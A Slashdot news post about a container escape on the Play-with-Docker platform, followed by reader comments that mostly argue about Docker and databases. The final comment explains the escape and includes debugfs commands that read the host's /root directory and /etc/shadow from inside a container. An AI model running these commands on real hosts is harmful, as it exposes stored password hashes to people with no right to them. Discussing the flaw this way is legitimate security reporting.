Security / Bug / Privacy / Software

Hack Allows Escape of Play-With-Docker Containers (threatpost.com)

secwatcher quotes a report from Threatpost: Researchers hacked the Docker test platform called Play-with-Docker, allowing them to access data and manipulate any test Docker containers running on the host system. The proof-of-concept hack does not impact production Docker instances, according to the CyberArk researchers who developed the attack. "The team was able to escape the container and run code remotely right on the host, which has obvious security implications," wrote researchers in a technical write-up posted Monday.

Play-with-Docker is a free, open-source, in-browser playground designed to help developers learn how to use containers. While Play-with-Docker has the support of Docker, it was not created by, nor is it maintained by, the firm. The environment approximates an Alpine Linux virtual machine in the browser, allowing users to build and run Docker containers in various configurations.
The vulnerability was reported to the developers of the platform on November 6. On January 7, the bug was patched. As for how many instances of Play-with-Docker may have been affected, "CyberArk estimated there were as many as 200 instances of containers running on the platform it analyzed," reports Threatpost. "It also estimates the domain receives 100,000 monthly site visitors."
  • by Anonymous Coward

    WTF is a docker?

    • Re:Okay, but... (Score:5, Insightful)

      by phantomfive ( 622387 ) on Monday January 14, 2019 @07:11PM (#57962660) Journal
      OK, imagine you are a dev team, and you don't know how to write an install script for your software. No problem, just load it into docker once, and you don't have to worry about cleaning up your install scripts.

      There are some valid use cases, but what I just described is the main one people use in the modern world. There are people who think things like, "Makefiles (or Maven or whatever) are too complicated because they don't allow you to have loops and functions." Nah, these are signs you are making things too complicated and they should be simplified.

      Oh, and while I'm criticizing things like an old man, I'll just add that the primary use for mongodb is people who don't know SQL or how to write a schema. That isn't everyone, and there are some valid reasons to use NoSQL, but a primary use case is people who don't know databases.
      • Re:Okay, but... (Score:4, Informative)

        by Richard_at_work ( 517087 ) on Monday January 14, 2019 @07:50PM (#57962864)

        I describe Docker as "an environment in a tin". You don't need to care about setting up full VMs for two bits of software that normally conflict, just run them on the same host under Docker with less overhead than full VMs. Upgrades are trivial as well.

        Being able to set up complete development environments (cache, database, reverse proxies, app servers, etc.) on each developer's box with a single command - brilliant. Each developer can develop in an environment that mimics the production environment much more closely these days, because the two environments might indeed be created from the same Docker Compose file.
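
        A minimal sketch of what such a single-command environment might look like (the service names and images here are assumptions for illustration, not anything from the thread):

        ```yaml
        # docker-compose.yml - hypothetical dev stack: cache, database, app, reverse proxy
        services:
          cache:
            image: redis:7-alpine
          db:
            image: postgres:16-alpine
            environment:
              POSTGRES_PASSWORD: devonly   # dev-only credential, never for production
          app:
            build: .                       # the application under development
            depends_on: [cache, db]
          proxy:
            image: nginx:alpine
            ports: ["8080:80"]
            depends_on: [app]
        ```

        With a file like this, `docker compose up -d` brings the whole stack up on a developer's box, and `docker compose down --volumes` removes it again.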

        Docker is brilliant.

        But what it isn't, and what pretty much every experienced Docker user will tell you it isn't, is a security system.

        • Being able to set up complete development environments (cache, database, reverse proxies, app servers, etc.) on each developer's box with a single command - brilliant

          So, I want you to know, if your install scripts aren't able to do this, your install scripts are broken. You can add "check out and build it" with a single command, too.

          • That's some interesting install scripts, if they can set up complex environments, including networks, hosts, DNS and the like... And how do your install scripts handle multiple copies of completely isolated environments, for testing purposes?

            But then there are many ways to do these things - Docker is one of them. And I can remove a Docker environment in seconds (just rm -f the containers and networks - gone, as if they never existed).
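
            A sketch of that teardown, assuming the containers and network were created by hand (the names here are hypothetical):

            ```shell
            # Force-remove the running containers, then the private network.
            # After this, no trace of the environment remains on the host.
            docker rm -f devenv-app devenv-db devenv-cache
            docker network rm devenv-net
            ```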

            • ...if they can set up complex environments, including networks, hosts, DNS and the like

              Even Windows can do all that on the command line; are you setting up DNS from a GUI app or something?

              Anyway, it doesn't really matter. There are certainly some cases where Docker is a good idea, and maybe your setup is one of them. You can tell pretty easily: are your install scripts a mess? Or can you install your software to a new target with a single command? Why is your build and deploy so complex?

            • by fwad ( 94117 )

              You hand-edit all this stuff? I guess that's called job security - until you get a boss who knows what a computer is and gives you a month to sort your stuff out, otherwise you're fired.

              I'm not saying docker doesn't have its uses (I know of one place whose build process actually automatically builds a cleaner docker image and this gets deployed to the farm), but a workaround for writing good software isn't one of them.

      • As a 25-year veteran of DB programming on Oracle, SQL Server, Cassandra, and Mongo, I would like to state that you are wrong about that. Sure, some people just don't know how to use a relational database properly, so they go schemaless - what I like to call an "HR problem, not a technology problem." But a lot, if not most, problem domains don't fit the relational model very well. A lot of systems store complex, dynamic hierarchical customer data. My daily job is storing unpredictable user-entered data (dynam
        • This is a good post.
        • by Bengie ( 1121981 )
          Relational databases are not ideal for non-relational data? I see the opposite in my line of work: people using document databases for relational data, who then have to constantly fix data inconsistencies. I always just assumed that I should use the best tool for the job, but I found out in the real world that most just use whatever they're most used to or is the current fad. Technology is magic. If you want your project to succeed, you need to do the current fad rain dance. If that's RDBMS, then you do the
    • At its core, a tar file and instructions on how to run it. :)

    • A slimmed-down VM.

      https://www.docker.com/resourc... [docker.com]

  • Show me a company that's been running VMs or containers for years and I'll likely show you a mess of orphaned guests or containers, oversubscribed hosts, and a management and IT group that's disconnected from their actual resources because they feel they can stretch them forever due to memory balloons, thin disks, HyperThreading||SMT, and other consolidation features that often have a very sharp double edge to them. I'm not saying VMs and containers have no place, I'm just saying they are often a roach motel and often very poorly understood and administered.
    • Depends. (Score:2, Interesting)

      by Anonymous Coward

      I've worked 3 places since virtualization became mainstream in the early 2000s. In 2003, we mandated that all new systems go onto VMs and that our vendors support it. We were the 25,000 gorilla, so this worked.
      A few specialized systems got dedicated hardware because the system was tied to the hardware, but that was the exception, by far.

      None of the projects I know about ever oversubscribed VMs, RAM, Storage or networking. Our CPU target was 80%. Before we started virtualizing, the average system u

    • IBM has been doing it properly since the 1980s.

      • I've worked with some z/OS boxes before and experienced their virtualization. I agree and haven't seen the same sprawl or crazy growth->neglect->stagnation->waste cycle that I've seen with VMware shops. However, the reasons aren't obvious. I'd say that the licensing costs are too high and the skillset too narrow so it simply doesn't get used to the same degree as more common VM solutions. Also, the "practices" are different for z/OS to some degree. However, it does have some things in common with V
  • Libraries are such a problem that you need virtual filesystems from the developer to actually run their program?

  • never let them escape the container, not even with a hacksaw.

    Wait, what?! People actually want to run OS containers... in a browser? Isn't this taking "clientless" a bit far? Play-With indeed.

    Play with your own Docker, people, and you won't get infected.

  • I've encountered docker with OpenFoam. For the user, it's a mess. In the setup I experimented with, it used virtualization, so right out of the gate, 10% of the performance is gone, in electricity and wasted heat. Docker is an ugly, ugly attempt at cross-platform.
  • What is the problem? A configuration error? Then it's a non-story; badly configured docker environments are a dime a dozen. A docker bug? Then say so, so we can patch our docker environments. A fundamental flaw in the docker environment that breaks the whole docker concept for good? NOW you'd have a story!

    WTF is it?

    • by Anonymous Coward

      Aside from the fundamental flaw that docker gives an illusion that it's a safe way to run untrusted code... :-)

      In this case, the debugfs command was available in the container and was able to bypass the AppArmor profile and gain access to the host filesystem. From there they were able to find everything they needed to build a reverse shell kernel module and load it to get full shell access to the host.
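
      As a rough illustration of the debugfs step described above (the device path and commands here are assumptions for illustration; the actual PoC went further, building and loading a kernel module):

      ```shell
      # Illustrative sketch only, not the actual PoC. Inside the container,
      # debugfs opens the host's ext4 block device directly, side-stepping the
      # container's mount namespace. /dev/xvda1 is an assumed device name.
      debugfs -R "ls -l /root" /dev/xvda1        # list a host directory, read-only
      debugfs -R "cat /etc/shadow" /dev/xvda1    # read a host file the container should never see
      ```

      This is why profiles for containerized workloads typically deny access to raw block devices; the write-up's point is that the AppArmor profile in place did not stop it.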
